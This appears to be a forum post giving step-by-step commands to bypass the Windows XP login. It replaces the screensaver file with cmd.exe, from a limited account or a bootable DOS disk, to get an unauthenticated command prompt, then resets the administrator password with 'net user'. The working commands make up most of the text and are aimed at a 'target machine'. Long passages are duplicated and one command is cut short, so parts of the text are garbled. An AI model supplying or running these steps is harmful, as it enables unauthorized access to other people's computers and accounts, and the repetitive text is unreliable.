If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:
c:\cd\ *drops to root
c:\cd\windows\system32 *directs to the system32 dir
c:\mkdir temphack *creates the folder temphack
c:\copy logon.scr temphack\logon.scr *backsup logon.scr
c:\copy cmd.exe temphack\cmd.exe *backsup cmd.exe
c:\del logon.scr *deletes original logon.scr
c:\rename cmd.exe logon.scr *renames cmd.exe to logon.scr
c:\exit *quits dos
Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Amit and you want the password blahblah enter this
"net user Amit blahblah"
BUT
In case:
If you aren't able to enter into a DOS and create such files then you have second alternative. But before i go into a subject i want to let you know sumthing about what i have faced during the time i was sitting in front of my computer whole day and finally i found out the way.
At first i had a Windows Xp OS "Dark edition rebirth Sp3"whose administrative authority is already pre-installed after you are finished setting up your OS. That means you cannot delete it even after creating another new administrator user. Which means i cannot create such files using other limited account.
Second, even i restart and press F8 n try to enter "Safe mode command prompt" it will ask for
administrative password. so, it seems impossible to get through it.
Third, i used the same OS bootable DVD and there was an option to enter into a DOS. i.e. NTFS4DOS. Which was my master key to enter into a DOS system without any administrator authority...(bingoooo)
I jst did the same thing that is mentiond in the above lines and what i explored was awesome. Guess what???
c:\cd\ *drops to root
c:\cd\windows\system32 *directs to the system32 dir
c:\mkdir temphack *creates the folder temphack
c:\copy logon.scr temphack\logon.scr *backsup logon.scr
c:\copy cmd.exe temphack\cmd.exe *backsup cmd.exe
c:\del logon.scr *deletes original logon.scr
c:\rename cmd.exe logon.scr *renames cmd.exe to logon.scr
c:\exit *quits dos
Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user
If the Administrator Account is called Amit and you want the password blahblah enter this
"net user Amit blahblah"
BUT
In case:
If you aren't able to enter into a DOS and create such files then you have second alternative. But before i go into a subject i want to let you know sumthing about what i have faced during the time i was sitting in front of my computer whole day and finally i found out the way.
At first i had a Windows Xp OS "Dark edition rebirth Sp3"whose administrative authority is already pre-installed after you are finished setting up your OS. That means you cannot delete it even after creating another new administrator user. Which means i cannot create such files using other limited account.
Second, even i restart and press F8 n try to enter "Safe mode command prompt" it will ask for
administrative password. so, it seems impossible to get through it.
Third, i used the same OS bootable DVD and there was an option to enter into a DOS. i.e. NTFS4DOS. Which was my master key to enter into a DOS system without any administrator authority...(bingoooo)
I jst did the same thing that is mentiond in the above lines and what i explored was awesome. Guess what???
whole day of hard work..#:-s
I will make some revised figure below for your convenience:
This is the same thing like above...
you just have to manage to get in DOS directly after restarting it. (if you do have any bootable DOS device or bootable OS CD/DVD and it lets you in then its perfect for this method)
c:\cd\ *drops to root
c:\cd\windows\system32 *directs to the system32 dir
c:\mkdir temphack *creates the folder temphack
c:\copy logon.scr temphack\logon.scr *backsup logon.scr
c:\copy cmd.exe temphack\cmd.exe *backsup cmd.exe
c:\del logon.scr *deletes original logon.scr
c:\rename cmd.exe logon.scr *renames cmd.exe to logon.scr
Press ALT+CTRL+DEL
-Press F8
-Enter any safemode option
-open control pannel
-open user accounts
-Select Administrator
-Remove Password
-Restart
And there you are in without any password...:)
At last,
However i have tried to manage my flash drive bootable of DOS so that i can make it more easier to start with it but i couldnt. So, if there are someone else out there who knows or who can find out a way to get in, plz inform over hir. Thankyou.
Warning!
This is just for the educational purpose. We will not be responsible for any harm or loss of the users. Users are responsible for there own actions